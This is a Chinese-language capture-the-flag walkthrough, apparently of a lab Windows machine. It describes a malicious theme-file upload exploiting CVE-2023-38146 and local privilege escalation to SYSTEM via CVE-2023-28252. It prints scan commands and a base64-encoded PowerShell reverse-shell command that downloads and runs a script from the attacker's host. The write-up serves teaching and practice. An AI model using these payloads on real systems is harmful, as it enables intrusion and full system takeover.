当前位置: 首页 > wzjs >正文

上海建设网站制作wordpress 主题域名授权

上海建设网站制作,wordpress 主题域名授权,长春招聘网,厦门市建设路网站一、初步侦察与立足点获取 1.1 端口扫描与服务识别 首先进行端口扫描。扫描结果显示,目标主机仅开放了 80 端口,运行一个 Web 服务。 sudo nmap 10.10.11.237 -p- --min-rate5000 -A1.2 Web 应用分析与功能点识别 访问该 Web 服务。经过初步浏览&…

在这里插入图片描述

一、初步侦察与立足点获取

1.1 端口扫描与服务识别

首先进行端口扫描。扫描结果显示,目标主机仅开放了 80 端口,运行一个 Web 服务。

sudo nmap 10.10.11.237 -p- --min-rate=5000 -A

1.2 Web 应用分析与功能点识别

访问该 Web 服务。经过初步浏览,发现该网站提供了一个功能:允许用户上传 Windows 主题文件,并提示后续会有人审查和使用这些主题。

尝试进行目录爆破,但未发现有价值的路径或文件。

dirsearch -u http://10.10.11.237

为确保全面,也对 UDP 端口进行了探测,确认仅有 TCP 80 端口对外开放。因此,攻击的焦点自然落在了这个主题文件上传功能上。

1.3 漏洞研究:Windows 主题 RCE (CVE-2023-38146)

我们开始思考:如果上传一个恶意文件,它应该是什么类型?又该如何被服务器解析并利用呢?

针对 Windows 主题文件上传功能,经过一番搜索,找到了一个相关的远程代码执行漏洞:CVE-2023-38146。该漏洞影响 Windows 11 主题处理机制,允许通过特制的恶意主题文件执行任意命令。

1.4 漏洞利用与初始访问获取

根据公开的 PoC,构造一个恶意的 .theme 文件并进行上传。

同时,在本地设置好监听器。上传恶意主题文件后,稍等片刻便成功接收到目标主机的回连。获取到的用户权限为 sam.emerson。立即检查用户特权,未发现可直接利用的高权限。

二、权限提升

2.1 信息搜集:发现提权线索 (CVE-2023-28252)

获得初始访问权限后,首要任务是进行信息搜集。很快就在 sam.emerson 用户的 Documents 目录中,发现了一个 PDF 文档,其内容是关于 CVE-2023-28252 漏洞的修复提醒。

2.2 漏洞研究:Windows CLFS 本地提权 (CVE-2023-28252)

网上搜索发现这是一个 Windows 本地提权漏洞,这几乎算是明示系统存在该漏洞了吧。当然也不一定,可能是故意在这里误导我们。总之在 github 上找到了一个编译好的提权程序,先尝试一下。

2.3 漏洞利用与 SYSTEM 权限获取

将下载的提权程序 (例如 clfs_eop.exe) 上传到目标机器。首先,尝试执行一个简单的 whoami 命令来验证漏洞利用效果:

.\clfs_eop.exe whoami

命令成功以 SYSTEM 权限执行,确认了漏洞的存在和利用程序的有效性。

既然漏洞验证成功,接下来便利用此权限执行一个反弹 shell 的 PowerShell payload,以获取一个稳定的 SYSTEM 权限会话。Payload 经过 Base64 编码 (UTF-16LE):

.\clfs_eop.exe 'powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADEANwAvAHIAZQB2AC4AcABzADEAJwApAA=='

本地监听器成功接收到回连,当前用户已是 NT AUTHORITY\SYSTEM,成功提权。



文章转载自:

http://ngXbcluV.rdzgm.cn
http://GRGvAROf.rdzgm.cn
http://Wh5t60u0.rdzgm.cn
http://ivAwHggx.rdzgm.cn
http://MRQT9ums.rdzgm.cn
http://0qTNXonZ.rdzgm.cn
http://0s8BRpDx.rdzgm.cn
http://4dwuCTWi.rdzgm.cn
http://dNxYxAnK.rdzgm.cn
http://kpmwS5mh.rdzgm.cn
http://z6ecERb4.rdzgm.cn
http://GNHLdqEh.rdzgm.cn
http://i9PYLRhT.rdzgm.cn
http://NaTmOwlJ.rdzgm.cn
http://R08PByxz.rdzgm.cn
http://77JL3rCw.rdzgm.cn
http://ZUY7HDDY.rdzgm.cn
http://NW0R5Gsk.rdzgm.cn
http://szVZ8wX4.rdzgm.cn
http://rBAD2xNT.rdzgm.cn
http://OTOQiVD5.rdzgm.cn
http://neTt27Cr.rdzgm.cn
http://NnhDAGUQ.rdzgm.cn
http://QhLsvz0w.rdzgm.cn
http://vhsufrQ1.rdzgm.cn
http://8mPsZwEi.rdzgm.cn
http://E5zwX37q.rdzgm.cn
http://DkXYZ4SE.rdzgm.cn
http://l9ZWDorm.rdzgm.cn
http://odIeEfGI.rdzgm.cn
http://www.dtcms.com/wzjs/663722.html

相关文章:

  • 东莞网站设计公司淘宝黄山网站推广公司
  • 长垣住房和城乡建设局 网站定制网站开发的目的是什么
  • 建立网站编程dw做网站 如何设置转动
  • hao爱做网站超炫网站
  • 如何在局域网建立网站做网站开发要学多久
  • php在网站开发中的作用重庆企业网站定制
  • 菜谱网站手机源码在线制作海报免费
  • 信息化建设网站wordpress 主题翻译
  • 太仓网站建设找哪家网站怎么建立数据库
  • 哈密网站制作公司网站标题应该怎么做SEO优化
  • 网站建立平台做网站的公司创业
  • 销售人员报销网站开发费名师工作室建设网站
  • 济南历城区网站建设网站header设计
  • 公司官方网站建设需要多少钱开通网站后
  • 上海jsp网站建设毕业设计做网站怎么答辩
  • 云南网站建设及优化wordpress需要哪些插件
  • 湖北专业网站建设检修wordpress官方响应式主题
  • 网站开发任务单百度文库设计本和游戏本的区别
  • php网站开发中如何seow是什么意思
  • 万网做网站花多少钱深圳商业网站建设系统
  • 网站优化 福州珠海专业网站建设公司哪家好
  • 网站怎么seo济南做外贸网站的公司
  • 烟台定制网站建设价格域名的申请及注册流程
  • 怎么做卖保险的网站网站如何被谷歌收录
  • 东莞路桥投资建设公司官网深圳哪家网站建设好seo1888
  • wordpress手机导航条怎么做做seo网站不用域名
  • 自已如何建网站上海建设安检站网站
  • 深圳市住房和建设局网站公司要建个网站
  • 公司网站建设包含的内容清欢互联网网站建设
  • 用表格做网站wordpress 缩率图